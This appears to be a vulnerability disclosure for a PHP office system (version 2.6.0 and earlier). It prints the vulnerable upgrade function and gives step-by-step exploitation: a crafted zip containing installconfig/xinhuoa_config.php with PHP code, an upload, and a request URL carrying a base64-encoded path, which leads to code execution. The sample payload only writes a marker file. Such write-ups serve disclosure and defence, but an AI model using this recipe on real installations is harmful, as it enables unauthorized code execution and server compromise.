Utilization conditions:
-
Have administrator account privileges with admin id 1
-
rockinzip is configured as true in /config/config.php
Origin
<= version 2.6.0,in /webmain/system/upgrade/upgradeAction.php
First, format the code
function loadinstallinfoAjax
public function loadinstallinfoAjax()
{
if (getconfig('systype') == 'demo') return returnerror('演示不要操作');
if ($this->adminid != 1) return returnerror('不是管理员不要操作');
$nwsp = $this->get('path');
if (!$nwsp) {
$nwsp = '';
} else {
$nwsp = $this->jm->base64decode($nwsp);
}
if (isempt($nwsp)) return returnerror('无效安装');
if (is_numeric($nwsp)) {
$barr = c('xinhuapi')->getdata('other', 'instinfo', array('id' => $nwsp,));
if (!$barr['success']) return $barr;
$farr = $barr['data']['farr'];
$filesize = $barr['data']['filesize'];
} else {
if (!getconfig('rockinzip')) return returnerror('系统未开启此功能');
$farr = c('zip')->zipget($nwsp);
if (!is_array($farr)) return returnerror($farr);
$filesize = filesize($nwsp);
}
$path = '' . UPDIR . '/logs/' . md5($nwsp) . '';
$filestr = '';
$agentstr = '';
$tablestr = '';
$menustr = '';
foreach ($farr as $k => $rs) {
$_pluj = $rs['filepath'];
$spath = $path . '/' . $_pluj;
$conts = $rs['filecontent'];
if (!contain($_pluj, 'installconfig')) {
$filestr .= '' . $_pluj . '<br>';
$fileext = substr($_pluj, -3);
if ($fileext == 'jpg' || $fileext == 'png' || $fileext == 'gif') {
if ($conts) $this->rock->createtxt($spath, base64_decode($conts));
}
} else {
$this->rock->createtxt($spath, base64_decode($conts));
}
}
$confpath = $path . '/installconfig/xinhuoa_config.php';
if (!file_exists($confpath)) return '无效安装包' . $confpath . '';
$conf = require($confpath);
$modepath = $path . '/installconfig/xinhuoa_data.json';
$mysqlpath = $path . '/installconfig/xinhuoa_mysql.json';
$modestr = '';
$menuarr = array();
if (file_exists($modepath)) {
$dsta = json_decode(file_get_contents($modepath), true);
if (isset($dsta['mode'])) foreach ($dsta['mode'] as $bh => $info) {
$modestr .= '' . $info['flow_set']['name'] . '(' . $bh . ') ';
}
if (isset($dsta['menu'])) foreach ($dsta['menu'] as $cd => $cdrs) {
if ($cd > 0) $menustr .= '<div style="margin:5px 0px" class="blank1"></div>';
$menustr .= '<input class="btn btn-default btn-xs" click="xuancaid,' . $cdrs['id'] . '" type="button" value="选上级菜单"><br>' . $cdrs['name'] . '(' . $cdrs['url'] . ')';
$menuarr[$cdrs['id']] = '-1';
if (isset($cdrs['children'])) foreach ($cdrs['children'] as $cd1 => $cdrs1) {
$menustr .= '<br> ┣' . $cdrs1['name'] . '(' . $cdrs1['url'] . ') ';
if (isset($cdrs1['children'])) foreach ($cdrs1['children'] as $cd2 => $cdrs2) {
$menustr .= '<br> ┣' . $cdrs2['name'] . '(' . $cdrs2['url'] . ') ';
}
}
}
if (isset($dsta['yydata'])) foreach ($dsta['yydata'] as $yb => $ybrs) {
$agentstr .= '<img src="' . $path . '/' . $ybrs['data']['face'] . '" align="absmiddle" width="20px" height="20px">' . $ybrs['data']['name'] . ' ';
}
}
if (file_exists($mysqlpath)) {
$dstd = json_decode(file_get_contents($mysqlpath), true);
foreach ($dstd as $dbs => $nse) {
$tablestr .= ',' . $dbs . '';
}
}
if ($tablestr) $tablestr = substr($tablestr, 1);
$conf['modestr'] = $modestr;
$conf['filestr'] = $filestr;
$conf['tablestr'] = $tablestr;
$conf['menustr'] = $menustr;
$conf['agentstr'] = $agentstr;
$conf['menuarr'] = $menuarr;
$conf['pathstr'] = $this->jm->base64encode($nwsp);
$conf['filesizecn'] = $this->rock->formatsize($filesize);
return returnsuccess($conf);
}
The first utilization condition is that we need to have account permissions with adminid=1
When we pass in a get parameter path, this function will base64 decode path and determine whether it is a numeric string. If it is, it will call the API on the official website to download from the plugin market. If it is not, it will determine whether rockinzip is configured in the /config/config.php as true. If it is true, the zipget function will be called for decompression. Therefore, the second utilization condition appears here, which requires the rockinzip value in the config to be true
function zipget will unzip the zipfile, but file content will be base64 encode
/include/chajian/zipChajian.php
It's okay, because in the loadinstallinfoAjax function, the file content will be decoded below, but the path will be moved to '' . UPDIR . '/logs/' . md5($nwsp) . ''
It seems too troublesome, it's okay. There's something interesting coming up below.
When the compressed file is decompressed and moved to (encoded and decoded) '' . UPDIR . '/logs/' . md5($nwsp) . '', it will determine whether there is a $path . '/installconfig/xinhuoa_config.php' file. If there is, it will include
How to use
make a zip
|-installconfig
....|-xinhuoa_config.php
put content to xinhuoa_config.php
<?php
file_put_contents("/tmp/shell.txt", "ok");
first, upload this compressed package anywhere and obtain the upload path
base64 encode file path
request /index.php?a=loadinstallinfo&m=upgrade&d=system&ajaxbool=true&rnd=39613&path=FILE_PATH_BASE64_ENCODE
Our code has been executed and/tmp/shell.txt has been written
React
Typescript
Django
Laravel
Facebook
Microsoft
Google
Alibaba
D3
Tencent